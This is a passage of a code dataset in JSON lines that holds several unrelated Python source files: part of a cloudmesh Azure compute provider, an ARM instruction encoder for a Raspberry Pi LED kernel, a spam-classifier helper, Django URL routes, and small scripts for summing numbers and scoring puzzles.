self.cmDatabase.collection('local-secrule').insert_one(add_rule)\n\n return add_rule\n\n def remove_secgroup(self, name=None):\n \"\"\"\n Delete the names security group\n\n :param name: The name of the Security Group to be deleted\n :return:\n \"\"\"\n\n del_group = self.network_client.network_security_groups. \\\n delete(self.GROUP_NAME, name)\n del_group.wait()\n Console.info(f'Security group {name} deleted from Az!')\n\n def upload_secgroup(self, name=None):\n \"\"\"\n Takes the security group from the local db and push it to az\n :param name:\n :return:\n \"\"\"\n local_group = self._get_local_sec_groups(name)[0]\n\n # transform local rules to az rule objects\n az_rules = self._sec_rules_local_to_az(local_group['rules'])\n\n # add az sec group\n self._add_az_sec_group(name)\n\n # push az rules\n results = []\n for az_rule in az_rules:\n ret = self.network_client.security_rules.create_or_update(\n self.GROUP_NAME,\n local_group['name'],\n az_rule.name,\n az_rule\n )\n\n results.append(ret.result().as_dict())\n\n return results\n\n def _check_local_rules_available(self, rules):\n \"\"\"\n checks if local rules available\n\n :param rules:\n :return:\n \"\"\"\n sec_rules = self.cmDatabase.collection('local-secrule').find(\n {'name': {'$in': rules}})\n rule_names = {i['name'] for i in sec_rules}\n\n if len(rule_names) == rules:\n raise ValueError(f'Some of the security rules are not available: '\n f'{str(rules)}')\n\n def add_rules_to_secgroup(self, secgroupname=None, newrules=None):\n \"\"\"\n Adds the rules to te local sec group only! it will update the az sec\n group once it is uploaded\n :param secgroupname:\n :param newrules:\n :return:\n \"\"\"\n if secgroupname is None and newrules is None:\n raise ValueError(\"name or rules are None\")\n\n if not isinstance(newrules, list):\n raise ValueError('rules should be a list')\n\n sec_group = self._get_local_sec_groups(secgroupname)[0]\n current_rules = set(sec_group['rules'])\n\n # check if the rules are already available\n self._check_local_rules_available(newrules)\n\n current_rules.update(newrules)\n\n cm = sec_group['cm']\n cm.update({\"modified\": str(datetime.now())})\n\n update = {\"$set\": {\"rules\": list(current_rules), \"cm\": cm, }}\n query = {'name': secgroupname}\n\n self.cmDatabase.collection('local-secgroup').update_one(query, update)\n\n return self._get_local_sec_groups(secgroupname)[0]\n\n def remove_rules_from_secgroup(self, name=None, rules=None):\n \"\"\"\n removes rules from a secgroup both locally and from azure group\n :param name:\n :param rules:\n :return:\n \"\"\"\n\n local_group = self._get_local_sec_groups(name)[0]\n new_rules = local_group['rules']\n [new_rules.remove(i) for i in rules]\n\n cm = local_group['cm']\n cm.update({\"modified\": str(datetime.now())})\n\n update = {\"$set\": {\"rules\": new_rules, \"cm\": cm, }}\n query = {'name': name}\n\n self.cmDatabase.collection('local-secgroup').update_one(query, update)\n Console.info(f'Security rules {str(rules)} locally!')\n\n if isinstance(rules, list):\n [self.network_client.security_rules.delete(self.GROUP_NAME, name,\n r).wait() for r in rules]\n else:\n self.network_client.security_rules.delete(self.GROUP_NAME,\n name,\n rules).wait()\n Console.info(f'Security rules {str(rules)} from az!')\n\n def create(self, name=None,\n image=None,\n size=None,\n location=None,\n timeout=180,\n key=None,\n secgroup=None,\n ip=None,\n user=None,\n public=True,\n group=None,\n metadata=None,\n flavor=None,\n **kwargs):\n \"\"\"\n creates a named node\n\n :param name: the name of the node\n :param image: the image used\n :param size: the size of the image\n :param timeout: a timeout in seconds that is invoked in case the image\n does not boot. The default is set to 3 minutes.\n :param kwargs: additional arguments passed along at time of boot\n :param location:\n :param key:\n :param secgroup:\n :param ip:\n :param user:\n :param public:\n :param group:\n :param metadata:\n :param flavor:\n :return:\n\n \"\"\"\n if group is None or group == \"default\":\n group = self.GROUP_NAME\n\n if name is None:\n name = self.VM_NAME\n\n if secgroup is None:\n secgroup = 'default'\n\n if ip is None:\n pub_ip = self.find_available_public_ip()[0]\n else:\n pub_ip = self._get_az_public_ip(ip)\n\n if key is None:\n key = self.user\n\n if flavor is None:\n flavor = 'Standard_B1s'\n\n vm_parameters = self._create_vm_parameters(name, secgroup, pub_ip, key,\n flavor)\n banner(\"Creating Server\")\n Console.msg(f\" Name: {name}\")\n Console.msg(f\" User: {user}\")\n Console.msg(f\" IP: {pub_ip['name']}\")\n Console.msg(f\" Image: {image}\")\n Console.msg(f\" Size: {size}\")\n Console.msg(f\" Public: ?\")\n Console.msg(f\" Key: {key}\")\n Console.msg(f\" Location: {location}\")\n Console.msg(f\" Timeout: {timeout}\")\n Console.msg(f\" Secgroup: {secgroup}\")\n Console.msg(f\" Group: {group}\")\n Console.msg(\"\")\n\n vm = self.vms.create_or_update(\n group,\n name,\n vm_parameters).result()\n\n Console.info('VM created: ' + vm.name)\n\n # todo data disk creation is taken off due to cost limitations!\n # disks_count = len(\n # list(self.compute_client.disks.list_by_resource_group(group)))\n #\n # # Creating a Managed Data Disk\n # async_disk_creation = self.compute_client.disks.create_or_update(\n # group,\n # f\"{self.OS_DISK_NAME}_{disks_count}\",\n # {\n # 'location': self.LOCATION,\n # 'disk_size_gb': 8,\n # 'creation_data': {\n # 'create_option': 'Empty'\n # }\n # }\n # )\n # data_disk = async_disk_creation.result()\n #\n # # Get the virtual machine by name\n # virtual_machine = self.vms.get(\n # group,\n # name\n # )\n #\n # # Attaching Data Disk to a Virtual Machine\n # virtual_machine.storage_profile.data_disks.append({\n # 'lun': 0,\n # 'name': data_disk.name,\n # 'create_option': 'Attach',\n # 'managed_disk': {\n # 'id': data_disk.id\n # }\n # })\n # updated_vm = self.vms.create_or_update(\n # group,\n # name,\n # virtual_machine\n # )\n # updated_dict = updated_vm.result().as_dict()\n\n updated_dict = vm.as_dict()\n updated_dict['status'] = 'ACTIVE'\n updated_dict['ssh_key_name'] = key\n\n _, pub_ip = self._get_pub_ip_for_vm(updated_dict)\n updated_dict['public_ip'] = pub_ip['ip_address']\n\n updated_dict['key'] = key\n updated_dict['secgroup'] = secgroup\n\n local_group = self._get_local_sec_groups(secgroup)[0]\n updated_dict['secrule'] = local_group['rules']\n\n return self.update_dict(updated_dict, kind='vm')[0]\n\n def _get_local_key_content(self, key_name):\n \"\"\"\n gets local key content from cb\n\n :param key_name:\n :return:\n \"\"\"\n query = {'name': key_name}\n\n key = list(self.cmDatabase.collection('local-key').find(query))\n\n if len(key) == 0:\n raise ValueError(f'Unable to find key: {key_name}')\n\n return key[0]\n\n def _create_vm_parameters(self, name, secgroup, ip, key, flavor):\n \"\"\"\n Create the VM parameters structure.\n :param secgroup: sec group name\n :param ip: az PublicIP object as dict\n :param key: pub key content\n :return:\n \"\"\"\n\n nic = self._create_az_nic(secgroup, ip)\n\n # # Parse Image from yaml file\n publisher, offer, sku, version = self.default[\"image\"].split(\":\")\n\n # Declare Virtual Machine Settings\n vm_parameters = {\n 'location': self.LOCATION,\n 'os_profile': {\n 'computer_name': name,\n 'admin_username': self.USERNAME,\n 'admin_password': self.PASSWORD,\n 'linux_configuration': {\n 'ssh': {\n 'public_keys': [{\n 'path': \"/home/\" + self.USERNAME +\n \"/.ssh/authorized_keys\",\n 'key_data':\n str(self._get_local_key_content(key)\n ['public_key']),\n }]\n }\n }\n },\n 'hardware_profile': {\n 'vm_size': flavor,\n },\n 'storage_profile': {\n 'image_reference': {\n 'publisher': publisher,\n 'offer': offer,\n 'sku': sku,\n 'version': version\n },\n 'os_disk': {\n 'name': f\"{self.OS_DISK_NAME}_{name}\",\n 'create_option': 'FromImage',\n 'disk_size_gb': 64,\n 'managed_disk': {\n 'storage_account_type': 'Premium_LRS',\n }\n }\n },\n 'network_profile': {\n 'network_interfaces': [{\n 'id': nic.id,\n }]\n },\n }\n\n return vm_parameters\n\n def _create_az_sec_group_if_not_exists(self, sec_group_name):\n \"\"\"\n creates azure sec group if not exists (by name)\n\n :param sec_group_name:\n :return:\n \"\"\"\n az_group = self._get_az_sec_groups(sec_group_name)\n\n if len(az_group) > 0:\n Console.info(f\"secgroup {sec_group_name} exists!\")\n else:\n self.upload_secgroup(sec_group_name)\n\n def _create_az_vnet_if_not_exists(self):\n \"\"\"\n creates azure virtual network\n\n :return:\n \"\"\"\n for vnet in self.network_client.virtual_networks.list(self.GROUP_NAME):\n if vnet.name == self.VNET_NAME:\n Console.info(f\"vnet {vnet.name} exists!\")\n return vnet\n\n async_vnet_creation = \\\n self.network_client.virtual_networks.create_or_update(\n self.GROUP_NAME,\n self.VNET_NAME,\n {\n 'location': self.LOCATION,\n 'address_space': {\n 'address_prefixes': ['10.0.0.0/16']\n }\n }\n )\n res = async_vnet_creation.result()\n Console.info(\"VNET created: \" + res.name)\n return res\n\n def _create_az_subnet_if_not_exits(self, secgroup):\n \"\"\"\n creates azure subnet\n\n :param secgroup:\n :return:\n \"\"\"\n for subnet in self.network_client.subnets.list(self.GROUP_NAME,\n self.VNET_NAME):\n if subnet.name == self.SUBNET_NAME:\n Console.info(f\"subnet {subnet.name} exists!\")\n return subnet\n\n subnet_params = {\n 'address_prefix': '10.0.0.0/24',\n 'network_security_group': {\n 'id': self._get_az_sec_groups(name=secgroup)[0].id\n }\n }\n\n async_subnet_creation = self.network_client.subnets.create_or_update(\n self.GROUP_NAME,\n self.VNET_NAME,\n self.SUBNET_NAME,\n subnet_parameters=subnet_params,\n )\n\n res = async_subnet_creation.result()\n Console.info(\"Subnet created: \" + res.name)\n return res\n\n def _create_az_nic(self, secgroup, ip):\n \"\"\"\n Create a Network Interface for a Virtual Machine\n\n :param secgroup:\n :param ip:\n :return:\n \"\"\"\n # A Resource group needs to be in place\n self._get_resource_group()\n\n # create sec group\n self._create_az_sec_group_if_not_exists(secgroup)\n\n # Create Virtual Network\n Console.info('Creating Vnet')\n vnet = self._create_az_vnet_if_not_exists()\n\n # Create Subnet\n Console.info('Creating Subnet')\n subnet = self._create_az_subnet_if_not_exits(secgroup)\n\n # Create NIC\n Console.info('Creating NIC')\n\n # each vm needs a nic. so, use self.NIC_NAME as a prefix for the NICs\n nic_count = len(\n list(self.network_client.network_interfaces.list(self.GROUP_NAME)))\n\n nic_params = {\n 'location': self.LOCATION,\n 'ip_configurations': [{\n 'name': self.IP_CONFIG_NAME,\n 'subnet': {\n 'id': subnet.id\n },\n 'public_ip_address': {\n 'id': ip['id']\n }\n }],\n 'network_security_group': {\n 'id': subnet.network_security_group.id,\n }\n }\n\n nic = self.network_client.network_interfaces.create_or_update(\n self.GROUP_NAME,\n f\"{self.NIC_NAME}_{nic_count}\",\n parameters=nic_params,\n ).result()\n\n Console.info(\"NIC created: \" + nic.name)\n\n return nic\n\n def start(self, group=None, name=None):\n \"\"\"\n start a node\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n # Start the VM\n Console.info('Starting Azure VM')\n async_vm_start = self.vms.start(group, name)\n async_vm_start.wait()\n return self.info(group, name, 'ACTIVE')\n\n def reboot(self, group=None, name=None):\n \"\"\"\n restart/reboot a node\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n # Restart the VM\n Console.info('Restarting Azure VM')\n async_vm_restart = self.vms.restart(group, name)\n async_vm_restart.wait()\n\n return self.info(group, name, 'REBOOT')\n\n def stop(self, group=None, name=None):\n \"\"\"\n stops the node with the given name\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node including updated status\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n # Stop the VM\n Console.info('Stopping Azure VM')\n async_vm_stop = self.vms.power_off(group, name)\n async_vm_stop.result()\n return self.info(group, name, 'SHUTOFF')\n\n def resume(self, group=None, name=None):\n \"\"\"\n resume the named node since Azure does not handle resume it uses start\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node including updated status\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n return self.start(group, name)\n\n def suspend(self, group=None, name=None):\n # TODO: Joaquin -> Completed\n \"\"\"\n suspends the node with the given name since Azure does not handle\n suspend it uses stop\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :return: The dict representing the node including updated status\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n if name is None:\n name = self.VM_NAME\n\n return self.vms.power_off(group, name).result()\n\n def info(self, group=None, name=None, status=None):\n \"\"\"\n gets the information of a node with a given name\n list VM in resource group\n\n :param group: the unique Resource Group name\n :param name: the unique Virtual Machine name\n :param status: TODO\n :return: dict representing the node including updated status\n \"\"\"\n if group is None:\n group = self.GROUP_NAME\n\n if name is None:\n name = self.VM_NAME\n\n node = self.vms.get(group, name, expand='instanceView')\n\n nodedict = node.as_dict()\n\n az_status = node.instance_view.statuses[-1].code.lower()\n nodedict['status'] = _get_az_vm_status(az_status)\n\n return self.update_dict(nodedict, kind='vm')\n\n def status(self, name=None):\n \"\"\"\n gets the status of a VM by name\n\n :param name:\n :return:\n \"\"\"\n return self.info(name=name)[0]['status']\n\n def list(self):\n \"\"\"\n List all Azure Virtual Machines from my Account\n\n :return: dict\n \"\"\"\n az_servers = []\n\n for vm in self.vms.list(self.GROUP_NAME):\n v = vm.as_dict()\n local_vm = self._get_local_vm(v['name'], quiet=True)\n\n if local_vm is None:\n Console.warning(\"no local vm found for \" + v['name'])\n\n v.update(local_vm)\n az_servers.append(v)\n\n return self.update_dict(az_servers, kind=\"vm\")\n\n def destroy(self, name=None):\n \"\"\"\n Destroys the node\n\n :param name: the name of the node\n :return: the dict of the node\n \"\"\"\n if name is None:\n vms = self.list()\n else:\n vms = filter(lambda x: x['name'] == name, self.list())\n\n # Delete vms\n res = []\n for vm in vms:\n elm = {}\n Console.info('Deleting Azure Virtual Machine')\n del_vm = self.vms.delete(self.GROUP_NAME, vm['name'])\n del_vm.wait()\n\n elm['name'] = vm['name']\n elm['status'] = 'TERMINATED'\n elm['type'] = vm['type']\n elm['location'] = vm['location']\n res.append(elm)\n\n res = self.update_dict(res, kind='vm')\n\n # # Delete Resource Group\n Console.info('Deleting Azure Resource Group')\n async_group_delete = \\\n self.resource_client.resource_groups.delete(self.GROUP_NAME)\n async_group_delete.wait()\n\n return res\n\n def images(self, **kwargs):\n \"\"\"\n Lists the images on the cloud\n\n :param kwargs:\n :return: dict\n \"\"\"\n region = self.LOCATION\n\n image_list = list()\n\n result_list_pub = self.imgs.list_publishers(\n region,\n )\n i = 0\n\n for publisher in result_list_pub:\n if i < 5:\n try:\n result_list_offers = self.imgs.list_offers(\n region,\n publisher.name,\n )\n\n for offer in result_list_offers:\n try:\n result_list_skus = self.imgs.list_skus(\n region,\n publisher.name,\n offer.name,\n )\n\n for sku in result_list_skus:\n try:\n result_list = self.imgs.list(\n region,\n publisher.name,\n offer.name,\n sku.name,\n )\n\n for version in result_list:\n try:\n result_get = self.imgs.get(\n region,\n publisher.name,\n offer.name,\n sku.name,\n version.name,\n )\n\n msg = 'PUBLISHER: {0}, OFFER: {1}, SKU: {2}, VERSION: {3}'.format(\n publisher.name,\n offer.name,\n sku.name,\n version.name,\n )\n Console.debug_msg(str(msg))\n image_list.append(result_get)\n except:\n print(\n \"Something failed in result_list\")\n\n except:\n print(\n \"Something failed in result_list_skus\")\n\n except:\n print(\"Something failed in result_list_offers\")\n\n except:\n print(\"Something failed in result_list_pub\")\n i = i + 1\n return self.get_list(image_list, kind=\"image\")\n\n def flavors(self):\n \"\"\"\n Lists the flavors on the cloud\n\n :return: dict of flavors\n \"\"\"\n vm_sizes_list = self.compute_client.virtual_machine_sizes.list(\n location=self.LOCATION)\n\n return self.get_list(vm_sizes_list, kind=\"flavor\")\n\n def flavor(self, name=None):\n \"\"\"\n Gets the flavor with a given name\n\n :param name: The name of the flavor\n :return: The dict of the flavor\n \"\"\"\n return self.find(self.flavors(), name=name)\n\n # noinspection PyMethodMayBeStatic\n def find(self, elements, name=None):\n \"\"\"\n Finds an element in elements with the specified name.\n\n :param elements: The elements\n :param name: The name to be found\n :return:\n \"\"\"\n\n for element in elements:\n if element[\"name\"] == name or element[\"cm\"][\"name\"] == name:\n return element\n return None\n\n def image(self, name=None, **kwargs):\n \"\"\"\n Gets the image with a given nmae\n\n :param name: The name of the image\n :param kwargs:\n :return: the dict of the image\n \"\"\"\n return self.find(self.images(**kwargs), name=name)\n\n def get_list(self, d, kind=None, debug=False, **kwargs):\n \"\"\"\n Lists the dict d on the cloud\n\n :param d:\n :param kind:\n :param debug:\n :param kwargs:\n :return: dict\n \"\"\"\n if self.vms:\n entries = []\n for entry in d:\n entries.append(entry.as_dict())\n if debug:\n pprint(entries)\n\n return self.update_dict(entries, kind=kind)\n return None\n\n def rename(self, name=None, destination=None):\n # TODO: Azure Provider rename function not implemented\n \"\"\"\n rename a node\n\n :param destination:\n :param name: the current name\n :return: the dict with the new name\n \"\"\"\n # if destination is None, increase the name counter and use the new name\n # must return dict\n\n HEADING(c=\".\")\n return None\n\n def update_dict(self, elements, kind=None):\n \"\"\"\n The cloud returns an object or list of objects With the dict method this\n object is converted to a cloudmesh dict. Typically this method is used\n internally.\n\n :param elements: the elements\n :param kind: Kind is image, flavor, or node, secgroup and key\n :return:\n \"\"\"\n\n if elements is None:\n return None\n elif type(elements) == list:\n _elements = elements\n else:\n _elements = [elements]\n d = []\n\n for entry in _elements:\n\n if \"cm\" not in entry.keys():\n entry['cm'] = {}\n\n entry[\"cm\"].update({\n \"kind\": kind,\n \"driver\": self.cloudtype,\n \"cloud\": self.cloud,\n \"name\": entry['name']\n })\n\n if kind == 'vm':\n if 'created' not in entry[\"cm\"].keys():\n entry[\"cm\"][\"created\"] = str(datetime.utcnow())\n entry[\"cm\"][\"updated\"] = str(datetime.utcnow())\n entry[\"cm\"][\"name\"] = entry[\"name\"]\n entry[\"cm\"][\"type\"] = entry[\n \"type\"] # Check feasibility of the following items\n entry[\"cm\"][\"location\"] = entry[\n \"location\"] # Check feasibility of the following items\n if 'status' in entry.keys():\n entry[\"cm\"][\"status\"] = str(entry[\"status\"])\n if 'ssh_key_name' in entry.keys():\n entry[\"cm\"][\"ssh_key_name\"] = str(entry[\"ssh_key_name\"])\n\n elif kind == 'flavor':\n\n entry[\"cm\"][\"created\"] = str(datetime.utcnow())\n entry[\"cm\"][\"name\"] = entry[\"name\"]\n entry[\"cm\"][\"number_of_cores\"] = entry[\"number_of_cores\"]\n entry[\"cm\"][\"os_disk_size_in_mb\"] = entry[\"os_disk_size_in_mb\"]\n entry[\"cm\"][\"resource_disk_size_in_mb\"] = entry[\n \"resource_disk_size_in_mb\"]\n entry[\"cm\"][\"memory_in_mb\"] = entry[\"memory_in_mb\"]\n entry[\"cm\"][\"max_data_disk_count\"] = entry[\n \"max_data_disk_count\"]\n entry[\"cm\"][\"updated\"] = str(datetime.utcnow())\n\n elif kind == 'image':\n\n entry['cm']['created'] = str(datetime.utcnow())\n entry['cm']['updated'] = str(datetime.utcnow())\n entry[\"cm\"][\"name\"] = entry[\"name\"]\n\n elif kind == 'secgroup':\n\n entry[\"cm\"][\"name\"] = entry[\"name\"]\n entry['cm']['created'] = str(datetime.utcnow())\n entry['cm']['updated'] = str(datetime.utcnow())\n\n elif kind == 'key':\n\n entry['cm']['created'] = str(datetime.utcnow())\n entry['cm']['updated'] = str(datetime.utcnow())\n\n elif kind == 'secrule':\n\n entry['cm']['created'] = str(datetime.utcnow())\n entry['cm']['updated'] = str(datetime.utcnow())\n\n d.append(entry)\n # VERBOSE(d, verbose=10)\n\n return d\n\n def wait(self,\n vm=None,\n interval=None,\n timeout=None):\n \"\"\"\n waits for completion (all the methods are implemented synchronously! hence this just\n lists vms)\n\n :param vm:\n :param interval:\n :param timeout:\n :return:\n \"\"\"\n return self.list()\n","sub_path":"cloudmesh/azure/compute/Provider.py","file_name":"Provider.py","file_ext":"py","file_size_in_byte":57995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"353701559","text":"def conduct(instruction_mapping): \n cmds = {'ADD': '00101000', 'SUB': '00100101', 'OR': '00111000', #001, 1\n 'STR': '01011000', 'LDR': '01011001',\n 'MOVW': '00110000', 'MOVT': '00110100',\n 'B': '1010'}\n cond = {'AL': '1110', 'NE': '0001', 'PL': '0101'}\n\n instructions_list = []\n \n for x in instruction_mapping: \n if x[0] in ['MOVW', 'MOVT']:\n register_number = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(x[2], 16)))[2:]\n immediate_value = f'{\"0\"*(16-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{immediate_value[0:4]}{register_number}{immediate_value[4:8]}{immediate_value[8:12]}{immediate_value[12:16]}\"\n \n # print(pattern)\n elif x[0] == 'ADD':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(x[3], 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n \n # print(pattern) \n elif x[0] == 'LDR':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(\"0\", 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n \n # print(pattern)\n elif x[0] == 'OR':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(x[3], 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n\n # print(pattern)\n elif x[0] == 'STR':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(\"0\", 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n \n # print(pattern)\n elif x[0] == 'SUB':\n source_register = '{:04b}'.format(int(x[2].replace('R','')))\n destination_register = '{:04b}'.format(int(x[1].replace('R','')))\n immbin = str(bin(int(x[3], 16)))[2:]\n immediate_value = f'{\"0\"*(12-len(immbin))}{immbin}'\n pattern = f\"1110{cmds[x[0]][:4]}{cmds[x[0]][4:]}{source_register}{destination_register}{immediate_value}\"\n \n # print(pattern)\n elif x[0] == 'BNE':\n immbin = str(bin(int(x[1], 16)))[2:]\n immediate_value = f'{\"0\"*(4-len(immbin))}{immbin}'\n pattern = '00011010' + immediate_value\n \n # print(pattern)\n elif x[0] == 'B': \n immbin = str(bin(int(x[1], 16)))[2:]\n immediate_value = f'{\"0\"*(4-len(immbin))}{immbin}'\n pattern = '11101010' + immediate_value\n \n # print(pattern)\n print(' '.join([pattern[a:a+4] for a in range(0, len(pattern), 4)]))\n instructions_list.append(pattern)\n save_to_kernel(instructions_list)\n # print(' '.join([immediate_value[a:a+4] for a in range(0, len(immediate_value), 4)]))\n\ndef convertToBinary(n):\n # Function to print binary number for the input decimal using recursion\n if n > 1:\n convertToBinary(n//2)\n print(n % 2,end = '')\n\ndef save_to_kernel(arrayoflines): \n # 11100011 01000011 01001111 00100000\n strbytes = ''\n for x in arrayoflines:\n bytelis = [x[a:a+8] for a in range(0, len(x), 8)] #splits the line into 8 bit section\n bytelis = [chr(int(a, 2)) for a in reversed(bytelis)] # turns each of those 8 bit things into char\n print(bytelis)\n strbytes += ''.join(bytelis) #combines all those characters to one line\n print(strbytes)\n file = open('kernel7.img', 'wb+') #write in byte form\n file.write(strbytes.encode('iso-8859-15')) #once it writes it above -> encoding turns into the format we want for the kernel file\n\ndef read_parser():\n filepath = 'pseudo.txt'\n with open(filepath) as fp:\n line = fp.readline()\n cnt = 0\n instructions = []\n while line:\n instructions.append(line.strip().split())\n line = fp.readline()\n cnt += 1\n return instructions\n\nconduct(read_parser())\n\n\n\n\n ","sub_path":"blinking_led.py","file_name":"blinking_led.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"612671635","text":"\nimport os\n\nimport bs4\nimport dill\nfrom spamclassifier import get_features\nAPP = os.path.abspath(__file__)\nAPP_DIR, APP_NAME = os.path.split(APP)\n\nclassifier_file_path = os.path.join(APP_DIR, 'saved_classifier', 'spam_classifier.pickle')\nclassifier_file = open(classifier_file_path, 'rb')\nclassifier_object = dill.load(classifier_file)\nclassifier_file.close()\n\n\ndef ham_or_spam(input_text):\n \"\"\"\n :param input_text: the passed input text to be classified\n :returns: Whether the passed input is a spam, ham or giving\n UnicodeEncodeError\n \"\"\"\n try:\n input_text = bs4.UnicodeDammit.detwingle(\n input_text).decode('utf-8')\n input_text = input_text.encode('ascii', 'ignore')\n\n hamorspam = classifier_object.classify(get_features(input_text,''))\n response = {'category': hamorspam, 'status': 'ok'}\n\n print (\"TEXT: '{0}' :: RESPONSE : '{1}'\".format(\n input_text.replace(\"\\n\", \" \").replace(\"\\r\", \" \"),\n hamorspam\n ))\n\n return response\n except UnicodeEncodeError:\n hamorspam = 'UnicodeEncodeError'\n response = {'category': hamorspam, 'status': 'error'}\n return response\n","sub_path":"spam_utils.py","file_name":"spam_utils.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"616729514","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 14 23:48:13 2016\n\n@author: Glaucia\n\"\"\"\nimport argparse\nimport re\nimport glob\n\n\ndef arguments():\n \"\"\"parsing arguments to have input file\"\"\"\n parser = argparse.ArgumentParser(description=\"\"\"my argument parser\"\"\") \n parser.add_argument('inputdirectoryname', type=str, help=\"\"\"give the entire name of the directory \n (and path) containing your files\"\"\") \n args = parser.parse_args()\n inp = args.inputdirectoryname\n return inp\n\n\ndef sumnumbersinalist (inputfile):\n \"\"\"gets and input file, reads and edits it, and sum across the integer values in this file\"\"\"\n numberslist = []\n with open(inputfile,'r') as my_file:\n for line in my_file:\n numberslist.append(line)\n numbers = \"\".join(numberslist)\n numbers = re.sub(\"\\W\",\" \",numbers)\n finalnumbers = numbers.strip()\n finalnumbers = finalnumbers.split(\" \")\n numlist = list(map(int,finalnumbers))\n return sum(numlist)\n \n\ndef main():\n arg = arguments()\n mainresult = sum(list(map(sumnumbersinalist,glob.glob(arg +\"/*.txt\"))))\n print(mainresult)\n \n \nif __name__ == '__main__':\n main() \n","sub_path":"answers/glaudelrio/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"505471431","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\napp_name = 'shop'\n\nurlpatterns = [\n path('', views.product_list, name='product_list'),\n path('/', views.product_detail, name='product_detail'),\n path('bonus/', views.bonus, name='bonus'),\n path('delivery/', views.delivery, name='delivery'),\n path('about/', views.about, name='about'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"337803148","text":"import math\nimport itertools as it\n\ndef sudoku_list():\n boxes = 81 - 18\n full = 100\n start = 0\n opts = [(n/boxes)*full for n in range(start, boxes+1)]\n return opts\n\ndef word_search_list():\n words = 17\n full = 100\n start = 0\n opts = [(n/words)*full for n in range(start, words+1)]\n return opts\n\ndef who_am_i_list():\n pics = 15\n full = 100\n start = 0\n opts = [(n/pics)*full for n in range(start, pics+1)]\n return opts\n\ndef greek_letters():\n letters = 22\n full = 100\n percent = 1.025\n start = 0\n opts = [(3.14)*(percent**n) for n in range(start, letters+1)]\n opts = [0.0] + opts\n return list(it.accumulate(opts))\n\ndef get_threes():\n threes = 3\n denom = 13\n full = 100\n start = 0\n opts = [(n/denom)*full for n in range(start, threes+1)]\n return opts\n\ndef diff_pi(num):\n return ((math.pi*100)-num)%1\n\ndef find_best_combination():\n sl = sudoku_list()\n wsl = word_search_list()\n wai = who_am_i_list()\n gl = greek_letters()\n th = get_threes()\n it.p = it.permutations\n corr_comb = [] #corresponding combinations\n opts = [] #options\n print(sl)\n print(wsl)\n print(wai)\n print(gl)\n print(th)\n for a in range(len(sl)): \n for b in range(len(wsl)):\n for c in range(len(wai)): \n for d in range(len(gl)):\n for e in range(len(th)):\n corr_comb.append([a,b,c,d,e])\n opts.append(diff_pi(sl[a]+wsl[b]+wai[c]+gl[d]+th[e]))\n closest = min(opts)\n index = opts.index(closest)\n c = corr_comb[opts.index(min(opts))]\n pts_list = [sl[c[0]],wsl[c[1]],wai[c[2]],gl[c[3]],th[c[4]]]\n pts = sum(pts_list)\n # print(\"Best option:\", closest)\n # print(\"Index:\", index)\n print(\"Best combination:\", c)\n print(\"Corresponding pts:\", pts_list)\n print(\"Actual points total:\", pts)\n print(\"Needed remaining:\", 314-int(pts))\n print(\"Final score:\", (314-int(pts))+pts)\n\nfind_best_combination()\n","sub_path":"progPractice/piAthlon.py","file_name":"piAthlon.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} 